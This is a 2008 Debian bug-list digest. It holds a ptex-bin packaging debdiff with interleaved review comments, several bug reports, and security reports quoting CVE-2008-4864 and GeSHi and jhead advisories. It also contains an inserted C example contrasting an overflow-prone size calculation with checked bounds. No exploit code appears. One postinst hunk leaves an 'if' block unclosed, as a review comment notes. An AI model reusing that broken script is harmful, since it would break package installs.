+++ ptex-bin-3.1.10+0.04b/debian/control
@@ -8,7 +8,7 @@
 Package: ptex-bin
 Architecture: any
 Replaces: platex
-Depends: ptex-base (>= 1:2.0-3), texlive-base-bin | tetex-bin (>= 2.0.2-17), texlive-math-extra | tetex-extra, ${shlibs:Depends}
+Depends: ptex-base (>= 1:2.0-3), texlive-base-bin, texlive-math-extra, ${shlibs:Depends}
 Suggests: dvipsk-ja, jbibtex-bin, jmpost, mendexk
 Conflicts: platex
 Description: The ASCII pTeX binary files
@@ -33,7 +33,7 @@
 
 Package: jmpost
 Architecture: any
-Depends: ${shlibs:Depends}, texlive-base-bin | tetex-bin (>= 1.0.7+20011202-5.1)
+Depends: ${shlibs:Depends}, texlive-base-bin
 Recommends: ptex-bin, dvipsk-ja
 Description: Japanized MetaPost, a system for drawing pictures
  This is jMetaPost, a Japanized MetaPost based on the original
diff -u ptex-bin-3.1.10+0.04b/debian/jbibtex-bin.postrm ptex-bin-3.1.10+0.04b/debian/jbibtex-bin.postrm
--- ptex-bin-3.1.10+0.04b/debian/jbibtex-bin.postrm
+++ ptex-bin-3.1.10+0.04b/debian/jbibtex-bin.postrm
@@ -27,9 +27,13 @@
 
mv /etc/texmf/texmf.d/60jbibtex.cnf /etc/texmf/texmf.d/60jbibtex.bak
 
-   update-texmf
-
-   mktexlsr
+   if [ -x "`which update-texmf 2>/dev/null`" ]; then
+	   update-texmf
+   fi
+
+   if [ -x "`which mktexlsr 2>/dev/null`" ]; then
+	   mktexlsr
+   fi
 
 ;;
 
diff -u ptex-bin-3.1.10+0.04b/debian/jmpost.postinst ptex-bin-3.1.10+0.04b/debian/jmpost.postinst
--- ptex-bin-3.1.10+0.04b/debian/jmpost.postinst
+++ ptex-bin-3.1.10+0.04b/debian/jmpost.postinst
@@ -25,7 +25,9 @@
 case "$1" in
 configure)
 
-mktexlsr
+	if [ -x "`which mktexlsr 2>/dev/null`" ]; then
+	mktexlsr
+	fi
 
 ln -sf /usr/bin/jmpost /usr/bin/inijmpost
 ln -sf /usr/bin/jmpost /usr/bin/virjmpost
diff -u ptex-bin-3.1.10+0.04b/debian/changelog ptex-bin-3.1.10+0.04b/debian/changelog
--- ptex-bin-3.1.10+0.04b/debian/changelog
+++ ptex-bin-3.1.10+0.04b/debian/changelog
@@ -1,3 +1,17 @@
+ptex-bin (3.1.10+0.04b-2.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Add a lot of if checks for mktexlsr, update-texmf and update-texmf
+in the maintainer scripts to ensure that they don't break during
+upgrades (Closes: #503543).
+  * Create /var/lib/texmf/web2c/ptex directory if it doesn't exist in
+ptex-bin.postinst. This will ensure working upgrades for etch->lenny
+in cases where the old tetex packages are still installed. The new
+fmtutil-sys from texlive is capable of creating this directory itself.
+  * Remove or'ed dependency on tetex packages.
+
+ -- Sven Hoexter <[EMAIL PROTECTED]>  Wed, 05 Nov 2008 20:04:13 +0100
+
 ptex-bin (3.1.10+0.04b-2) unstable; urgency=low
 
   * Bumped to Standards-Version: 3.7.3.
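Review bot: The second changelog bullet lists "mktexlsr, update-texmf and update-texmf", naming update-texmf twice; the scripts in this debdiff guard mktexlsr, update-texmf and update-fmtutil, so the last name should presumably read update-fmtutil. The third bullet names /var/lib/texmf/web2c/ptex while the postinst hunk tests $ptex_formats, so confirm that the variable really expands to that path.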
diff -u ptex-bin-3.1.10+0.04b/debian/jmpost.postrm ptex-bin-3.1.10+0.04b/debian/jmpost.postrm
--- ptex-bin-3.1.10+0.04b/debian/jmpost.postrm
+++ ptex-bin-3.1.10+0.04b/debian/jmpost.postrm
@@ -19,11 +19,11 @@
 case "$1" in
purge|remove)
 
-   if mktexlsr --help >/dev/null 2>&1; then 
- mktexlsr
-   fi
+	if [ -x "`which mktexlsr 2>/dev/null`" ]; then
+	mktexlsr
+	fi
 
-;;
+	;;
 
upgrade|failed-upgrade|abort-install|abort-upgrade|disappear)
 
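Review bot: The re-indentation of `;;` at the end of the `purge|remove` branch is a whitespace-only change unrelated to the fix; drop it so the NMU diff stays minimal. In the new guard, `mktexlsr` sits at the same indent level as `if` and `fi`, so indent the body one level to make the conditional readable.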
diff -u ptex-bin-3.1.10+0.04b/debian/ptex-bin.postinst ptex-bin-3.1.10+0.04b/debian/ptex-bin.postinst
--- ptex-bin-3.1.10+0.04b/debian/ptex-bin.postinst
+++ ptex-bin-3.1.10+0.04b/debian/ptex-bin.postinst
@@ -37,7 +37,11 @@
 EOF
 fi
 
+
+if [ -x "`which update-texmf 2>/dev/null`" ]; then
 update-texmf
+fi
+
 
 # Generate /etc/texmf/fmt.d/30ptex.cnf
 if [ ! -f /etc/texmf/fmt.d/30ptex.cnf ]; then
@@ -52,7 +56,11 @@
 EOF
 fi
 
+if [ -x "`which update-fmtutil 2>/dev/null`" ]; then
 update-fmtutil
+fi
+
+if [ -x "`which mktexlsr 2>/dev/null`" ]; then
 mktexlsr
 
 # Run fmtutil and generate *.fmt
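Review bot: The `if [ -x ... ]; then` added in front of `mktexlsr` has no matching `fi` in this hunk or in the next one shown, unlike the `update-fmtutil` guard directly above it. As written the conditional stays open over the rest of the script, so either everything after it runs only when mktexlsr exists or the shell rejects the script at end of file; add `fi` on the line after `mktexlsr`.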
@@ -61,6 +69,14 @@
 pdftex_formats=$TEXMF/web2c/pdftex
 append_db=/usr/share/texmf/web2c/mktexupd
 
+#Make sure that the ptex directory exists
+#This is a workaround for etch->lenny upgrades with
+#fmtutil-sys from the old tetex packages
+if [ ! -d $ptex_formats ]; then
+	mkdir -p $ptex_formats
+fi
+
+
 TEMPFILE=`tempfile -p ptex`
 echo "Running fmtutil-sys. This may take some time
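Review bot: `$ptex_formats` is expanded unquoted in both the `[ ! -d ... ]` test and the `mkdir -p` call, so an empty value or one containing whitespace changes what `[` and `mkdir` actually see; write it as "$ptex_formats" in both places. `mkdir -p` already succeeds when the directory exists, so the surrounding `if` can be dropped.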

Bug#504627: neko: Did not remove conffiles when purged

2008-11-05 Thread Sam Morris
Package: neko
Version: 1.7.0-1
Severity: serious

After purging neko, the following files were left behind on my system:

/etc/apache/conf.d/mod_neko
/etc/apache2/mods-available/neko.conf
/etc/apache2/mods-available/neko.load

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (530, 'testing'), (520, 'unstable'), (510, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-686 (SMP w/1 CPU core)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages neko depends on:
ii  libc6               2.7-15             GNU C Library: Shared libraries
ii  libgc1c2            1:6.8-1.1          conservative garbage collector for
ii  libglib2.0-0        2.16.6-1           The GLib library of C routines
ii  libmysqlclient15off 5.0.51a-15         MySQL database client library
ii  libpcre3            7.6-2.1            Perl 5 Compatible Regular Expressi
ii  libsqlite3-0        3.5.9-5            SQLite 3 shared library
ii  zlib1g              1:1.2.3.3.dfsg-12  compression library - runtime

neko recommends no packages.

neko suggests no packages.






Bug#504626: [nvidia-glx] Quietly drops support for several chipsets

2008-11-05 Thread Filipus Klutiero
Package: nvidia-glx
Version: 173.14.09-5
Severity: serious
Tags: patch

Since 1.0.9746, support for several cards was dropped quietly. As pre-lenny 
suites need to have the X video driver specified, X will fail to start after 
an upgrade on a system using one of these cards.

Replacing the current NEWS.Debian with one containing one entry with the 
following description would warn users:

 * LEGACY GPUs: This release no longer supports GeForce 2, 3 and 4,
   Quadro 2 and 4, Quadro DCC and Quadro NVS 400, 280 SD and 50 PCI.
   If you use one of these cards, install the nvidia-glx-legacy-96xx,
   nvidia-glx-legacy-96xx-dev and/or nvidia-kernel-legacy-96xx-source packages
   instead.






Bug#504589: marked as done (Download location at debian/copyright is out of date)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Wed, 05 Nov 2008 19:17:11 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#504589: fixed in pmount 0.9.18-2
has caused the Debian Bug report #504589,
regarding Download location at debian/copyright is out of date
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
504589: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504589
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: pmount
Version: 0.9.18-1
Severity: serious

Hello,

According to Debian Policy 12.5 (a MUST hence serious severity):

In addition, the copyright file must say where the upstream sources (if any)
were obtained.

However, http://www.piware.de/projects/ stated in copyright does not contain
versions beyond 0.9.13. Since Google didn't return anything very obvious at
first, it took me a while to figure out current upstream sources are hosted
on Debian's Alioth/Git.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (101, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.27-1-amd64 (SMP w/1 CPU core)
Locale: LANG=lt_LT.UTF-8, LC_CTYPE=lt_LT.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages pmount depends on:
ii  libblkid1       1.41.3-1  block device id library
ii  libc6           2.7-16    GNU C Library: Shared libraries
ii  libdbus-1-3     1.2.1-4   simple interprocess messaging syst
ii  libhal-storage1 0.5.11-6  Hardware Abstraction Layer - share
ii  libhal1         0.5.11-6  Hardware Abstraction Layer - share
ii  libsysfs2       2.1.0-5   interface library to sysfs

pmount recommends no packages.

Versions of packages pmount suggests:
ii  cryptsetup  2:1.0.6-6  configures encrypted block devices
ii  hal         0.5.11-6   Hardware Abstraction Layer

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: pmount
Source-Version: 0.9.18-2

We believe that the bug you reported is fixed in the latest version of
pmount, which is due to be installed in the Debian FTP archive:

pmount_0.9.18-2.diff.gz
  to pool/main/p/pmount/pmount_0.9.18-2.diff.gz
pmount_0.9.18-2.dsc
  to pool/main/p/pmount/pmount_0.9.18-2.dsc
pmount_0.9.18-2_amd64.deb
  to pool/main/p/pmount/pmount_0.9.18-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Vincent Fourmond <[EMAIL PROTECTED]> (supplier of updated pmount package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


Format: 1.8
Date: Wed, 05 Nov 2008 19:53:20 +0100
Source: pmount
Binary: pmount
Architecture: source amd64
Version: 0.9.18-2
Distribution: unstable
Urgency: medium
Maintainer: Vincent Fourmond <[EMAIL PROTECTED]>
Changed-By: Vincent Fourmond <[EMAIL PROTECTED]>
Description: 
 pmount - mount removable devices as normal user
Closes: 504589
Changes: 
 pmount (0.9.18-2) unstable; urgency=medium
 .
   * Adding Vcs-* fields
   * Updated debian/copyright with new location of download files
 (closes: #504589)
   * Urgency medium to fix a trivial RC bug in testing.


--- End Message ---


Bug#504445: marked as done (SA32559: GeSHi Unspecified Code Execution Vulnerability)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Wed, 05 Nov 2008 19:32:05 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#504445: fixed in geshi 1.0.8.1-1
has caused the Debian Bug report #504445,
regarding SA32559: GeSHi Unspecified Code Execution Vulnerability
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
504445: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504445
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: php-geshi
Severity: grave
Version: 1.0.8-1
Tags: security

Hi,

The following SA (Secunia Advisory) id was published for GeSHi.

SA32559[1]:
> A vulnerability has been reported in GeSHI, which can potentially be
> exploited by malicious people to compromise a vulnerable system.
>
> The vulnerability is caused due to an unspecified error, which may allow
> execution of arbitrary code on an affected system.
>
> The vulnerability is reported in versions prior to 1.0.8.1.

If you fix the vulnerability please also make sure to include the SA id in the 
changelog entry.

[1]http://secunia.com/Advisories/32559/

Cheers,
-- 
Raphael Geissert - Debian Maintainer
www.debian.org - get.debian.net


signature.asc
Description: This is a digitally signed message part.
--- End Message ---
--- Begin Message ---
Source: geshi
Source-Version: 1.0.8.1-1

We believe that the bug you reported is fixed in the latest version of
geshi, which is due to be installed in the Debian FTP archive:

geshi_1.0.8.1-1.diff.gz
  to pool/main/g/geshi/geshi_1.0.8.1-1.diff.gz
geshi_1.0.8.1-1.dsc
  to pool/main/g/geshi/geshi_1.0.8.1-1.dsc
geshi_1.0.8.1.orig.tar.gz
  to pool/main/g/geshi/geshi_1.0.8.1.orig.tar.gz
php-geshi_1.0.8.1-1_all.deb
  to pool/main/g/geshi/php-geshi_1.0.8.1-1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Romain Beauxis <[EMAIL PROTECTED]> (supplier of updated geshi package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


Format: 1.8
Date: Wed, 05 Nov 2008 20:06:07 +0100
Source: geshi
Binary: php-geshi
Architecture: source all
Version: 1.0.8.1-1
Distribution: unstable
Urgency: low
Maintainer: Mediawiki Maintenance Team <[EMAIL PROTECTED]>
Changed-By: Romain Beauxis <[EMAIL PROTECTED]>
Description: 
 php-geshi  - Generic Syntax Highlighter
Closes: 504445
Changes: 
 geshi (1.0.8.1-1) unstable; urgency=low
 .
   * New upstream release.
   * fix SA32559:
   "A vulnerability has been reported in GeSHI,
which can potentially be exploited by malicious
people to compromise a vulnerable system.
 .
The vulnerability is caused due to an unspecified
error, which may allow execution of arbitrary code
on an affected system."
Closes: #504445

Processed: your mail

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> notfound 504445 1.0.8-1
Bug#504445: SA32559: GeSHi Unspecified Code Execution Vulnerability
Bug no longer marked as found in version 1.0.8-1.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Processed: Fwd: woops

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> found 504445 1.0.8-1
Bug#504445: SA32559: GeSHi Unspecified Code Execution Vulnerability
Bug marked as found in version 1.0.8-1.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Processed: tagging as pending bugs that are closed by packages in NEW

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Wed Nov  5 19:03:09 UTC 2008
> # Tagging as pending bugs that are closed by packages in NEW
> # http://ftp-master.debian.org/new.html
> #
> # Source package in NEW: libtemplate-plugin-dbi-perl
> tags 504575 + pending
Bug#504575: ITP: libtemplate-plugin-dbi-perl -- DBI plugin for the Template Toolkit
There were no tags set.
Tags added: pending

> # Source package in NEW: request-tracker3.8
> tags 498124 + pending
Bug number 498124 not found. (Is it archived?)

> # Source package in NEW: request-tracker3.8
> tags 492939 + pending
Bug#492939: ITP: request-tracker3.8 -- Extensible trouble-ticket tracking system
There were no tags set.
Tags added: pending

> # Source package in NEW: request-tracker3.8
> tags 503329 + pending
Bug#503329: request-tracker3.6 - Generates self referencing URLs from wrong values
Tags were: patch
Tags added: pending

> # Source package in NEW: request-tracker3.8
> tags 503667 + pending
Bug#503667: request-tracker3.6 - Use debconf as registry
There were no tags set.
Tags added: pending

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Processed: reassign 504619 to python2.5

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> reassign 504619 python2.5
Bug#504619: python2.5: CVE-2008-4864 multiple integer overflows in imageop module
Warning: Unknown package 'pyton2.5'
Bug reassigned from package `pyton2.5' to `python2.5'.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#504620: python2.4: CVE-2008-4864 multiple integer overflows in imageop module

2008-11-05 Thread Nico Golde
Package: python2.4
Severity: grave
Tags: security patch

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for python2.4.

CVE-2008-4864[0]:
| Multiple integer overflows in imageop.c in the imageop module in
| Python 1.5.2 through 2.5.1 allow context-dependent attackers to break
| out of the Python VM and execute arbitrary code via large integer
| values in certain arguments to the crop function, leading to a buffer
| overflow, a different vulnerability than CVE-2007-4965 and
| CVE-2008-1679.

Upstream patch: 
http://svn.python.org/view/python/trunk/Modules/imageop.c?p2=%2Fpython%2Ftrunk%2FModules%2Fimageop.c&p1=python%2Ftrunk%2FModules%2Fimageop.c&r1=66689&r2=66688&rev=66689&view=diff&diff_format=u

If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.

For further information see:

[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864
http://security-tracker.debian.net/tracker/CVE-2008-4864

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpRSWGX8r0ae.pgp
Description: PGP signature


Processed: your mail

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> found 504445 1.0.7.22-1
Bug#504445: SA32559: GeSHi Unspecified Code Execution Vulnerability
Bug marked as found in version 1.0.7.22-1.

> found 504445 1.0.7.14-1
Bug#504445: SA32559: GeSHi Unspecified Code Execution Vulnerability
Bug marked as found in version 1.0.7.14-1.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#504619: python2.5: CVE-2008-4864 multiple integer overflows in imageop module

2008-11-05 Thread Nico Golde
Package: pyton2.5
Version: 2.5-5+etch1
Severity: grave
Tags: security patch

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for pyton2.5.

CVE-2008-4864[0]:
| Multiple integer overflows in imageop.c in the imageop module in
| Python 1.5.2 through 2.5.1 allow context-dependent attackers to break
| out of the Python VM and execute arbitrary code via large integer
| values in certain arguments to the crop function, leading to a buffer
| overflow, a different vulnerability than CVE-2007-4965 and
| CVE-2008-1679.

If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.

Upstream patch: 
http://svn.python.org/view/python/trunk/Modules/imageop.c?p2=%2Fpython%2Ftrunk%2FModules%2Fimageop.c&p1=python%2Ftrunk%2FModules%2Fimageop.c&r1=66689&r2=66688&rev=66689&view=diff&diff_format=u

For further information see:

[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864
http://security-tracker.debian.net/tracker/CVE-2008-4864

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpsU1gnojjO3.pgp
Description: PGP signature
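
The class of bug that the CVE-2008-4864 text in the two reports above describes, as an added example: this is not the imageop.c code or the upstream patch, and `crop_checked`, `mul_size` and `wrapped_len32` are hypothetical names for a simplified crop over a packed image. It shows how an unchecked 32-bit `size*x*y` product wraps, and a crop that validates every product and coordinate before it allocates or copies.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Store a*b in *out. Returns 0 on success, -1 if the product does not
 * fit in size_t. */
static int mul_size(size_t a, size_t b, size_t *out)
{
    if (a != 0 && b > SIZE_MAX / a)
        return -1;
    *out = a * b;
    return 0;
}

/* The value an unchecked 32-bit "size*x*y" yields (reduced modulo 2^32).
 * Computed in 64-bit unsigned steps so the demonstration is well defined. */
static uint32_t wrapped_len32(uint32_t size, uint32_t x, uint32_t y)
{
    uint32_t t = (uint32_t)((uint64_t)size * x);
    return (uint32_t)((uint64_t)t * y);
}

/* Simplified crop (assumption: the rectangle is ordered and lies inside
 * the image). Copies the inclusive rectangle (x0,y0)-(x1,y1) out of a
 * packed image of width x height pixels with `size` bytes per pixel.
 * Returns a malloc'd buffer and its length in *out_len, or NULL when any
 * argument is inconsistent. */
unsigned char *crop_checked(const unsigned char *img, size_t len,
                            int size, int width, int height,
                            int x0, int y0, int x1, int y1,
                            size_t *out_len)
{
    size_t row, total, nw, nh, nrow, ntotal, r;
    unsigned char *out;

    if (size != 1 && size != 2 && size != 4)
        return NULL;
    if (width <= 0 || height <= 0)
        return NULL;

    /* The claimed image size must be representable AND match the buffer. */
    if (mul_size((size_t)size, (size_t)width, &row) != 0 ||
        mul_size(row, (size_t)height, &total) != 0)
        return NULL;
    if (len != total)
        return NULL;

    /* Every coordinate must fall inside the validated image. */
    if (x0 < 0 || y0 < 0 || x1 < x0 || y1 < y0 ||
        x1 >= width || y1 >= height)
        return NULL;

    nw = (size_t)(x1 - x0) + 1;
    nh = (size_t)(y1 - y0) + 1;
    if (mul_size(nw, (size_t)size, &nrow) != 0 ||
        mul_size(nrow, nh, &ntotal) != 0)
        return NULL;

    out = malloc(ntotal);
    if (out == NULL)
        return NULL;
    for (r = 0; r < nh; r++)
        memcpy(out + r * nrow,
               img + ((size_t)y0 + r) * row + (size_t)x0 * (size_t)size,
               nrow);
    *out_len = ntotal;
    return out;
}

int main(void)
{
    unsigned char img[12];   /* constructed 4x3 image, 1 byte per pixel */
    unsigned char *out;
    size_t n = 0;
    int i;

    for (i = 0; i < 12; i++)
        img[i] = (unsigned char)i;

    /* Constructed dimensions: 4 * 65536 * 65536 is 2^34, which a 32-bit
     * product reduces to 0, so an empty buffer would pass a length test. */
    printf("wrapped length: %u\n", (unsigned)wrapped_len32(4, 65536, 65536));

    out = crop_checked(img, sizeof img, 1, 4, 3, 1, 1, 2, 2, &n);
    printf("valid crop: %lu bytes\n", (unsigned long)(out ? n : 0));
    free(out);

    out = crop_checked(img, 0, 4, 65536, 65536, 0, 0, 0, 0, &n);
    printf("oversized claim: %s\n", out ? "accepted" : "rejected");
    free(out);
    return 0;
}
```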


Bug#504502: btrfs is WiP

2008-11-05 Thread Adeodato Simó
* Daniel Baumann [Wed, 05 Nov 2008 19:24:14 +0100]:

> Adeodato Simó wrote:
> > I know Daniel doesn't agree, so I'll wait a couple days before
> > proceeding with the removal in case he wants to provide a good rationale
> > as for why this package (in its current version) should be part of a
> > stable Debian release. Daniel?

> since the description clearly states that it is experimental, it's
> better to have it in than out because it makes backporting easier
> (limits interdiffs), gets more attention by people.

What is the action to take if a user installs btrfs in stable, finds a
"data loss" bug, and reports it as grave? "Sorry, although you installed
this from stable this software is experimental and you should've read
the description and anyway the bug you report does not happen in the
version in backports.org."?

> however, there is no point having btrfs in without btrfs-tools, and for
> btrfs-tools see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=495562#46

That is moot because, should I change my opinion about btrfs, I'd let
btrfs-tools back.

-- 
Adeodato Simó dato at net.com.org.es
Debian Developer  adeodato at debian.org
 
Any life, no matter how long and complex it may be, is made up of a
single moment: the moment in which a man finds out, once and for all,
who he is.
-- Jorge Luis Borges







Bug#504502: btrfs is WiP

2008-11-05 Thread Daniel Baumann
Adeodato Simó wrote:
> I know Daniel doesn't agree, so I'll wait a couple days before
> proceeding with the removal in case he wants to provide a good rationale
> as for why this package (in its current version) should be part of a
> stable Debian release. Daniel?

since the description clearly states that it is experimental, it's
better to have it in than out because it makes backporting easier
(limits interdiffs), gets more attention by people.

however, there is no point having btrfs in without btrfs-tools, and for
btrfs-tools see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=495562#46

-- 
Address:Daniel Baumann, Burgunderstrasse 3, CH-4562 Biberist
Email:  [EMAIL PROTECTED]
Internet:   http://people.panthera-systems.net/~daniel-baumann/






Bug#504603: libbobcat1: shlibs file fails to reflect ABI additions

2008-11-05 Thread Frank B. Brokken
Dear Aaron M. Ucko, you wrote:
> 
> Package: libbobcat1
> Version: 1.21.1-1
> Severity: serious
> Justification: Policy 8.6
> 
> libbobcat1's shlibs file leads to unversioned dependencies on the
> library, ...
> 
> In this case, though, I would suggest simply adding -V to your call to
> dh_makeshlibs, such that packages built against libbobcat1 always
> depend on at least the upstream version against which they were built.

Dear Aaron,

Thank you for filing this bug against Bobcat. You're of course absolutely
right and I think your suggestion is a valuable one that can easily be met in
future releases. Actually the bug filed against xd clarified the (dependency)
bug that had crept into the dependencies list. The problem will be attacked
along two main approaches:

1. paying more attention to ABI and API breakages;
2. making sure that (at least my :-) packages clearly display the bobcat
   version against which the package should be linked.

This reply was (of course) not written to close the bug; it was primarily
sent to let you and others know that I'm aware of the problem and that for now
using the latest (now 1.21.1) Bobcat version with packages that depend on
Bobcat should be enough to avoid problems. Current work in progress on Bobcat
will probably result in version 2.01.1 from which point on more thorough
attention will be paid to version dependencies.

Cheers,

-- 
Frank B. Brokken
Center for Information Technology, University of Groningen
(+31) 50 363 9281
Public PGP key: http://pgp.surfnet.nl
Key Fingerprint: 8E36 9FC4 1DAA FCDF 1A0D  B19F DAC4 BE50 38C6 6170






Bug#490893: still reproducible?

2008-11-05 Thread Sven Joachim
On 2008-11-05 11:01 +0100, Yves-Alexis Perez wrote:

> Is this still reproducible with the fix for #448470 which should make
> portmap initscript more reliable?

At least one user (CC'ed) reported that the initscript did not run at
all, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=490893#25.

Subhashis, do you still see this?

Regards,
Sven






Bug#503645: jhead: CVE-2008-4640, CVE-2008-4641 command injection via filename and insecure file handling

2008-11-05 Thread Ludovic Rousseau
On Tue, Nov 4, 2008 at 1:29 PM, Matthias Wandel <[EMAIL PROTECTED]> wrote:
> Ok, I changed the mkstemp back to mktemp.

Do you plan to release the 2.85 version soon?
I can only find version 2.84 on [1].

Bye

[1] http://www.sentex.net/~mwandel/jhead/

-- 
 Dr. Ludovic Rousseau






Bug#503205: twitux: Will not connect to twitter.

2008-11-05 Thread Rodrigo Gallardo
On Wed, Nov 05, 2008 at 04:21:09PM +, Lawrence Woodman wrote:
> Rodrigo,
> 
> > I think I have reproduced this: Are you using NetworkManager (gnome's
> > default is yes)? If so, does *it* think the network is active? I think
> > twitux is asking nm about the network status and silently failing to
> > do *anything* if the answer from there is "off".
> 
> As a follow-up to my last email.  I have just uninstalled NetworkManager
> and twitux works fine.  

great!

> P.S. If you want me to test anything on my machine I am more than happy
> to help.


No need. Now that I know what's going on I can conduct further testing locally.

Thanks for the report, I will probably forward this upstream for them to
work out some sort of solution. I believe that twitux should at least warn
somehow about its thinking there is no network.






Bug#504502: btrfs is WiP

2008-11-05 Thread Adeodato Simó
* Riku Voipio [Wed, 05 Nov 2008 14:23:12 +0200]:

> btrfs-source package description states, and homepage[1] agrees:

>   Btrfs is under heavy development, and is not suitable for any uses other
>   than benchmarking and review. The Btrfs disk format is not yet
>   finalized.

> This is not something we want to release in stable. Remove from lenny
> and keep bug open to not let it migrate?

> [1] http://btrfs.wiki.kernel.org/index.php/Main_Page

Right, btrfs-tools was removed from testing a while ago (#495562), and I
overlooked removing btrfs-source as well.

I know Daniel doesn't agree, so I'll wait a couple days before
proceeding with the removal in case he wants to provide a good rationale
as for why this package (in its current version) should be part of a
stable Debian release. Daniel?

Cheers,

-- 
Adeodato Simó dato at net.com.org.es
Debian Developer  adeodato at debian.org
 
Faced with the choice between changing one's mind and proving that there
is no need to do so, almost everyone gets busy with the proof.
-- J.K. Galbraith







Bug#503205: [EMAIL PROTECTED]: Re: Bug#503205: twitux: Will not connect to twitter.]

2008-11-05 Thread Rodrigo Gallardo
- Forwarded message from Lawrence Woodman <[EMAIL PROTECTED]> -

Subject: Re: Bug#503205: twitux: Will not connect to twitter.
From: Lawrence Woodman <[EMAIL PROTECTED]>
To: Rodrigo Gallardo <[EMAIL PROTECTED]>
Date: Wed, 05 Nov 2008 15:54:26 +

Rodrigo,

> I think I have reproduced this: Are you using NetworkManager (gnome's
> default is yes)? If so, does *it* think the network is active? I think
> twitux is asking nm about the network status and silently failing to
> do *anything* if the answer from there is "off".

I am using NetworkManager, mainly because I haven't had the time to work
out how to remove it without removing other things that I want to keep.

Anyway, Network Manager thinks that there is no connection. So it ties
in with your theory so far.

bfn


Lawrence


- End forwarded message -
- Forwarded message from Lawrence Woodman <[EMAIL PROTECTED]> -

Subject: Re: Bug#503205: twitux: Will not connect to twitter.
From: Lawrence Woodman <[EMAIL PROTECTED]>
To: Rodrigo Gallardo <[EMAIL PROTECTED]>
Date: Wed, 05 Nov 2008 16:21:09 +

Rodrigo,

> I think I have reproduced this: Are you using NetworkManager (gnome's
> default is yes)? If so, does *it* think the network is active? I think
> twitux is asking nm about the network status and silently failing to
> do *anything* if the answer from there is "off".

As a follow-up to my last email.  I have just uninstalled NetworkManager
and twitux works fine.  


This is great.  Well done.


Lawrence


P.S. If you want me to test anything on my machine I am more than happy
to help.


- End forwarded message -






Bug#504604: current lenny version do not read files

2008-11-05 Thread Leonardo Boselli
> If you wish to submit further information on this problem, please
> send it to [EMAIL PROTECTED], as before.

Additional notes:
I know that summing numbers and strings, assuming strings are counted as 0
when summed, is a poor programming practice, but nonetheless it is the same
behaviour that other programming languages (Perl, for example) have.
I have installed a non-Debian version of OOo 3.0 and now I am almost happy,
but nonetheless I want to point out the error, since every previous version of
OOo and also the current 3.0 ones (as well as MS Excel) consider the blank string
as a 0 when adding values, so there could be a lot of files around that are not
